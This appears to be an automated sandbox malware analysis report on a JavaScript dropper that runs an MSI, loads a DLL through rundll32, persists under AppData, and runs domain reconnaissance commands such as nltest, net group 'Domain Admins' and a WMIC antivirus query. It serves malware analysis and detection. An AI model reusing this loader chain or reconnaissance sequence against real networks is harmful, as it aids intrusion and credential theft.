Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_000000018004B1A4
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI846B.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFFD6.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI54.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA3.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC4.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI103.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI181.tmp Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIFFD6.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00586A50 3_2_00586A50
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005BF032 3_2_005BF032
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AE270 3_2_005AE270
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AC2CA 3_2_005AC2CA
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B92A9 3_2_005B92A9
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B84BD 3_2_005B84BD
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AA587 3_2_005AA587
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_0058C870 3_2_0058C870
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005AA915 3_2_005AA915
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A4920 3_2_005A4920
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B0A48 3_2_005B0A48
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00589CC0 3_2_00589CC0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B5D6D 3_2_005B5D6D
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180017FE8 5_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006DFF4 5_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800220D8 5_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007C140 5_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180060174 5_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018008023C 5_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000834C 5_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006C470 5_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800784E0 5_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800764F0 5_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180060578 5_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180010580 5_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004E5DC 5_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180062600 5_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002610 5_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180004638 5_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004A650 5_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006E760 5_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800647B0 5_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007E7C7 5_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180076930 5_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180062954 5_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006A994 5_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006E9FC 5_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180082A18 5_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180072A27 5_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180010B58 5_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180026C84 5_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018001ECF4 5_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180008E20 5_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180052FD8 5_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018003AFE8 5_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005D014 5_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006F0B4 5_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800630CC 5_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005912C 5_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004B1A4 5_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049278 5_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007B2D0 5_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018002B2EC 5_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006D3D4 5_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800033E0 5_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180075480 5_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800694A0 5_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005958C 5_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800576DC 5_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800097E0 5_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800277FC 5_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018002D964 5_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180073B60 5_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018007BBB0 5_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018001BC38 5_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005DD18 5_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180073DF0 5_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180011DF0 5_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018005BE6C 5_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004FF88 5_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE1030 5_2_00000235B5CE1030
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031453C 6_3_000001801031453C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010314B50 6_3_0000018010314B50
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801032D19C 6_3_000001801032D19C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801036318C 6_3_000001801036318C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103551F8 6_3_00000180103551F8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103401FB 6_3_00000180103401FB
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103451C0 6_3_00000180103451C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103711CC 6_3_00000180103711CC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031E31C 6_3_000001801031E31C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039B370 6_3_000001801039B370
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316358 6_3_0000018010316358
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103873A0 6_3_00000180103873A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103583EC 6_3_00000180103583EC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010382430 6_3_0000018010382430
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801036E45C 6_3_000001801036E45C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010367448 6_3_0000018010367448
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010373498 6_3_0000018010373498
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103994F0 6_3_00000180103994F0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103784D8 6_3_00000180103784D8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035F4C4 6_3_000001801035F4C4
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010385534 6_3_0000018010385534
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010318568 6_3_0000018010318568
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010330540 6_3_0000018010330540
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103405A0 6_3_00000180103405A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103705FC 6_3_00000180103705FC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801033F5FB 6_3_000001801033F5FB
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035B5D0 6_3_000001801035B5D0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039D63C 6_3_000001801039D63C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010339650 6_3_0000018010339650
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801038672C 6_3_000001801038672C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A9708 6_3_00000180103A9708
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010335768 6_3_0000018010335768
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103277E0 6_3_00000180103277E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801034D834 6_3_000001801034D834
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010348824 6_3_0000018010348824
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010377874 6_3_0000018010377874
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039D8B8 6_3_000001801039D8B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103898B0 6_3_00000180103898B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A4940 6_3_00000180103A4940
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010388980 6_3_0000018010388980
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031D9E4 6_3_000001801031D9E4
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035EA84 6_3_000001801035EA84
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010340A8A 6_3_0000018010340A8A
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010392B38 6_3_0000018010392B38
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801039DB34 6_3_000001801039DB34
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010380B54 6_3_0000018010380B54
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103AEBB8 6_3_00000180103AEBB8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801035BB94 6_3_000001801035BB94
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010377C14 6_3_0000018010377C14
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801033FC72 6_3_000001801033FC72
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010319CBC 6_3_0000018010319CBC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010340D18 6_3_0000018010340D18
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010385D68 6_3_0000018010385D68
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010339D94 6_3_0000018010339D94
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A9D94 6_3_00000180103A9D94
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010368DF8 6_3_0000018010368DF8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801032FE38 6_3_000001801032FE38
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031BEB8 6_3_000001801031BEB8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103AAE84 6_3_00000180103AAE84
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010367EE8 6_3_0000018010367EE8
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103A0EC0 6_3_00000180103A0EC0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010371ECC 6_3_0000018010371ECC
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801038AF20 6_3_000001801038AF20
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010359F68 6_3_0000018010359F68
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010317FD0 6_3_0000018010317FD0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010336038 6_3_0000018010336038
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801036F018 6_3_000001801036F018
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801034E074 6_3_000001801034E074
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010316078 6_3_0000018010316078
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801037A048 6_3_000001801037A048
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00000180103570C0 6_3_00000180103570C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010384134 6_3_0000018010384134
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010370114 6_3_0000018010370114
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010380154 6_3_0000018010380154
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B1030 7_2_000001EF532B1030
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: :wtfbbq (copy) 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\sharepoint\360total.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
Source: Joe Sandbox View Dropped File: C:\Windows\Installer\MSI181.tmp 1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
Found potential string decryption / allocating functions
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI181.tmp Code function: String function: 005A325F appears 103 times
Source: C:\Windows\Installer\MSI181.tmp Code function: String function: 005A3790 appears 39 times
Source: C:\Windows\Installer\MSI181.tmp Code function: String function: 005A3292 appears 66 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Document_a51_19i793302-14b09981a5569-3684u8.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winJS@93/27@13/11
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 5_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 5_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 5_2_000000018008395A
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00583860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 3_2_00583860
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_00584BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 3_2_00584BA0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005845B0 LoadResource,LockResource,SizeofResource, 3_2_005845B0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 5_2_0000000180049AEC
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3588:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF41638D872A10A065.TMP Jump to behavior
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Installer\MSI181.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: rundll32.exe, rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, 00000006.00000003.2934807774.00000180103B5000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2933161054.00000180103B5000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: rundll32.exe, 00000006.00000003.2934807774.00000180103B5000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2933161054.00000180103B5000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: rundll32.exe, 00000006.00000003.2936562885.000001800FF54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Document_a51_19i793302-14b09981a5569-3684u8.js ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI181.tmp "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
